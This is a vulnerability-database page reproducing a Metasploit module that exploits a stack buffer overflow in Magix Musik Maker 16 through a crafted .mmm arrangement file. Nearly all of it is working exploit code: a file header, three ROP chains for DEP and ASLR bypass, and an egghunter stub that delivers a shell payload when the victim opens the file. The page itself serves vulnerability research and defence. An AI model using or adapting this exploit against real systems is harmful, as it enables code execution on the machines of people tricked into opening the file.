Vulners
Lucene search
Magix Musik Maker 16 - '.mmm' Local Stack Buffer Overflow (Metasploit)
##
# $Id: magix_musikmaker_16_mmm.rb 12688 2011-05-22 23:41:15Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Magix Musik Maker 16 .mmm Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Magix Musik Maker 16.
When opening a specially crafted arrangement file (.mmm) in the application, an
unsafe strcpy() will allow you to overwrite a SEH handler. This exploit
bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and
might require up to several seconds to receive a shell.
},
'License' => MSF_LICENSE,
'Author' =>
[
'acidgen', #found the vulnerability
'corelanc0d3r' #rop exploit + msf module
],
'Version' => '$Revision: 12688 $',
'References' =>
[
[ 'OSVDB', '72455'],
[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 8000, #could be more, but this is enough
'DisableNops' => 'True',
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Universal DEP & ASLR Bypass',
{
'OffSet' => 198,
'Ret' => 0x200146fa, #add esp,40c/ret [ltkrn14n.dll]
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Apr 26 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'mmm file', 'msf.mmm']),
], self.class)
end
def junk
return rand_text(4).unpack("L")[0].to_i
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
badchars = ""
eggoptions =
{
:checksum => false,
:eggtag => "Wo0t",
:depmethod => "copy",
:depreg => "edi",
:depdest => "ebp"
}
hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)
header = "RIFF"
header << "\x8c"
header << "A"
header << "\x07\x00"
header << "SEKDSVIP"
header << "\x10\x07\x00\x00\x9b"
header << "[n"
header << "\x00" * 5
header << "\x11"
header << "\x00" * 3
header << "\x08"
header << "\x00" * 3
header << "D"
header << "\xac\x00\x00\x11"
header << "\x00" * 9
header << "9@"
header << "\x00\x00\xf0"
header << "B"
header << "\x00" * 4
header << "\xbd\x04\xef\xfe\x00\x00\x01"
header << "\x00" * 3
header << "\x10\x00\x04\x00\x02"
header << "\x00" * 3
header << "\x10\x00\x04\x00\x02\x00"
header << "?"
header << "\x00" * 3
header << "("
header << "\x00" * 3
header << "\x04\x00\x04\x00\x01"
header << "\x00" * 15
header << "K"
header << "\x91"
header << "2"
header << "\x01\xd0\x02\x00\x00"
header << "@"
header << "\x02\x00\x00"
header << "UUUUUU"
header << "\xf5"
header << "?"
header << "\x10"
header << "\x00" * 7
header << "\xff" * 8
header << "\x00" * 1680
header << "LISTx"
header << "\x95\x02\x00"
header << "physfile"
header << "\xf8\x08\x00\x00"
header << "C:\\Documents and Settings\\"
header << rand_text(8)
header << "\\My Documents\\MAGIX_Music_Maker_16\\AudioTemp"
header << "\x00" * 52
header << "Fat Rocker I_ogg.HDP"
header << "\x00" * 110
header << "C:\\Documents and Settings\\All Users\\Application Data\\MAGIX\\Music_Maker_16\\_Demos\\Demo"
header << "\x00" * 175
header << "Fat Rocker I.OGG"
header << "\x00" * 678
header << "\xf0\xbf"
header << "\x00" * 22
header << "\xf0"
header << "?"
header << "\x00" * 6
header << "^@"
header << "\x00" * 6
header << "^@"
header << "\x00" * 264
filename = "C:\\temp\\"
filename << "\xb3\x10\xf8\x1f" * 14 # slide
filename << "\x1e\x92\x01\x20" # align
rop_chain1 =
[
#API pointer
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
0x1ff810b3, # rop nop
0x1ff810b3, # rop nop
0x1ff810b3, # rop nop
0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]
0x2005012c, # &API ptr
0x200263e4, # MOV EAX,DWORD PTR DS:[ECX] # RETN ** [LTKRN14N.dll]
0x1ffa3ab3, # MOV DWORD PTR DS:[EBX],EAX # MOV EAX,1 # POP EBX # RETN 0C ** [LTDIS14n.dll]
junk,
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
junk,
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA63D,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]
0x2001283a, # POP ESI # POP EBP # POP EBX # ADD ESP,1F4 # RETN 10 ** [LTKRN14N.dll]
# write
0x1ff9cf5a, # MOV DWORD PTR DS:[EAX],ECX # MOV EAX,1 # POP ESI # RETN 08 ** [LTDIS14n.dll]
junk,
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA5F9,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
junk,
junk,
0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]
junk,
].pack("V*")
rop_chain2 = [
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA591,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 #
junk,
junk,
0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]
junk,
junk,
junk,
junk,
0x2E9FB65D,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA539,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN **D16059A3 [LTKRN14N.dll]
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10
junk,
junk,
0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
junk,
junk,
junk,
0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
0x1ffa0231, # DEC EAX # RETN ** [LTDIS14n.dll]
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA4D9,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN D16059A3
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
junk,
junk,
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
junk,
junk,
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA469,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x1ff72ce1, # XCHG EAX,ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV EAX,1 # RETN
junk,
].pack("V*")
rop_chain3 = [
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08
junk,
junk,
junk,
junk,
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2004FF98,
0x1ffaccf6, # ADD EAX,100 # POP EBP # RETN
junk,
0x20026406, # MOV EAX,DWORD PTR DS:[EAX] # NEG EAX # RETN ** [LTKRN14N.dll]
0x20026408, # NEG EAX # RETN ** [LTKRN14N.dll]
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
0x2004da79, # XOR EAX,EAX # RETN ** [LTKRN14N.dll]
0x1ff93ae1, # ADD EAX,ESI # POP ESI # RETN
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1fffeb75, # XCHG EAX,EBP # RETN ** [LTKRN14N.dll]
junk,
junk,
#Oh Irony !
0x6001ac84, # PUSHAD # RETN ** [ijl10.dll]
].pack("V*")
rop_chain1_filler = rand_text(target['OffSet'] - rop_chain1.length - 2 )
# find a close heap
prehunter = "\x33\xC0" #xor eax,eax
prehunter << "\x64\x8B\x40\x30" #mov eax,fs[:30]
prehunter << "\x83\xC0\x48" #add eax,48
prehunter << "\x83\xC0\x48" #add eax,48
prehunter << "\x8B\x10" #mov edx,[eax]
prehunter << "\x83\xc2\x4c" #add edx,4c
prehunter << "\x83\xc2\x4c" #add edx,4c
prehunter << "\x8B\x12" #mov edx,[edx]
nops = make_nops(100)
filler = "\x5D\xC6\x9F\x2E" # offset to 0x2000
filler << "\xc2\x53\x02\x20" # RETN
filler << "\x04\x80\xfa\x1f" # jump - first run : 0x1ffa8004 : {pivot 8} # POP EDI # POP EBP # RETN ** [LTDIS14n.dll]
filler << "\x12\x3a\xff\x1f" # p/p/p/p/add esp,90/ret [ltkrn14n.dll] - second run
filler << "\xff\xff\xff\xff" # access violation
buffer = header
buffer << filename
buffer << rop_chain1
buffer << rop_chain1_filler
buffer << [target.ret].pack("V")
buffer << filler
buffer << rop_chain2
buffer << rop_chain3
buffer << prehunter
buffer << hunter
buffer << nops
buffer << egg
filecontent = header + buffer
print_status("Writing payload to file")
file_create(filecontent)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 May 2011 00:00Current
7.4High risk
Vulners AI Score7.4